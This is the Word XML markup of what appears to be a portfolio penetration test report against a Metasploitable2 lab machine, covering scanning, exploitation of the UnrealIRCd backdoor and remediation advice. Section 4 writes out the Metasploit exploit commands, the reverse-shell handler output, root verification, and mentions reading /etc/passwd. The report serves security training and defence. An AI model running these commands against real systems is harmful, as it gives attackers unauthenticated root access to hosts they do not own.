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sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolated Lab Environment — Metasploitable2 Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared as a self-directed learning / portfolio project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Date: July 29, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a penetration test conducted against an intentionally vulnerable target machine (Metasploitable2) from an isolated Kali Linux attacker workstation. The purpose of this exercise was to practice the core phases of a real-world penetration test — network reconnaissance, service enumeration, vulnerability identification, exploitation, and post-exploitation reporting — in a safe, fully isolated lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A single critical vulnerability was identified and exploited during this assessment: an unauthenticated remote command execution backdoor in the UnrealIRCd service running on the target. Exploitation resulted in immediate, unauthenticated remote access with root-level privileges — the highest possible impact rating, as no credentials or user interaction were required to fully compromise the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8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Metasploitable2 (192.168.56.30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux (192.168.56.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Isolated VirtualBox Internal Network ("intnet")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Unauthenticated black-box network penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment was conducted entirely within a self-contained virtual lab. Both the attacker and target machines were placed on a VirtualBox Internal Network with no bridge or route to any production network, host machine, or the internet. This ensured no third-party systems could be affected by the testing activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 In-Scope Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target VM: Metasploitable2 (192.168.56.30) — intentionally vulnerable Linux distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker VM: Kali Linux (192.168.56.10) — testing platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify live hosts and open services on the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate service versions to identify known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit any identified vulnerability to demonstrate real-world impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document findings and provide remediation guidance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing followed a standard four-phase penetration testing methodology: reconnaissance, scanning/enumeration, exploitation, and post-exploitation. All activity was performed manually from the Kali Linux attacker VM using industry-standard open-source tooling (arp-scan, Nmap, and the Metasploit Framework).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Live hosts on the isolated lab network were identified using ARP scanning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo arp-scan --localnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This confirmed the target was reachable at 192.168.56.30 on the isolated network segment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Port Scanning and Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A full TCP port scan with service/version detection and OS fingerprinting was run against the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo nmap -sV -sC -O -p- 192.168.56.30 -oN metasploitable_scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scan returned a large number of open ports typical of Metasploitable2's intentionally insecure configuration, including services such as FTP, SSH, Telnet, SMTP, DNS, HTTP, SMB (Samba 3.0.20-Debian), RMI, IRC (UnrealIRCd), Apache Tomcat, and several RPC services. The target was fingerprinted as an older Linux 2.6.x kernel, consistent with the known Metasploitable2 image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of these, three services stood out as high-value targets due to known, publicly documented vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UnrealIRCd (ports 6667/6697) — known backdoored source distribution (CVE-2010-2075)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Samba 3.0.20-Debian — known remote code execution vulnerability in this version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache Tomcat/Coyote (port 8180) — commonly configured with default/weak manager credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The UnrealIRCd backdoor was selected for exploitation due to its high reliability and well-documented behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Finding: UnrealIRCd Backdoor Command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8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS (approx.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">UnrealIRCd 3.2.8.1, TCP port 6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Unauthenticated Remote Command Execution (Backdoor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A version of UnrealIRCd distributed between November 2009 and June 2010 was compromised at the source-distribution level, embedding a backdoor that allows any remote, unauthenticated user to execute arbitrary system commands by sending specially crafted data to the IRC listener. The target's IRC service was identified as vulnerable to this issue during exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Metasploit Framework module targeting this vulnerability was used to gain access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf &gt; use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set RHOSTS 192.168.56.30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set LHOST 192.168.56.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exploit executed successfully, and a Meterpreter session was established without requiring any credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.56.10:4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] 192.168.56.30:6667 - The target appears to be vulnerable. UnrealIRCd detected via IRC commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Sending stage (1062760 bytes) to 192.168.56.30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (192.168.56.10:4444 -&gt; 192.168.56.30:34441)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Post-Exploitation and Impact Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Following successful exploitation, the privilege level of the compromised session was verified:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Server username: root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This confirms the exploit granted immediate root-level access — the highest privilege level on a Linux system — with no privilege escalation steps required. Basic system enumeration was performed to confirm the scope of impact:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Computer     : metasploitable.localdomain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Architecture : i686</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A shell was then spawned to demonstrate full command execution capability on the underlying operating system, including the ability to read sensitive system files such as /etc/passwd, confirming complete confidentiality, integrity, and availability impact on the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Risk and Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because this vulnerability requires no authentication and yields immediate root access, any system exposing this service to an untrusted network — including the internet — would be trivially and fully compromised by an attacker with basic tooling knowledge. In a production context, this would represent total loss of confidentiality, integrity, and availability for the affected host, and could serve as a pivot point for further attacks against internal network segments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade UnrealIRCd to a version released after June 2010, or migrate to a current, actively maintained IRC daemon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify the integrity of any downloaded software using checksums/signatures before deployment, to detect supply-chain tampering of this kind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove or disable IRC services entirely if they are not a required business function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply network segmentation and firewall rules so that internal/legacy services are never directly reachable from untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement continuous vulnerability scanning to catch known-vulnerable service versions before they can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additionally review and remediate the Samba 3.0.20 and Apache Tomcat findings noted in Section 3.2, as either represents a plausible secondary attack path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This exercise successfully demonstrated the full penetration testing lifecycle in a controlled, isolated environment: reconnaissance, scanning, vulnerability identification, exploitation, and impact verification. The exploited vulnerability (UnrealIRCd 3.2.8.1 backdoor) resulted in unauthenticated root-level compromise of the target system, representing the most severe possible outcome of a security assessment. All testing was conducted safely against an intentionally vulnerable training image with no exposure to production systems or third parties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
        </w:rPr>
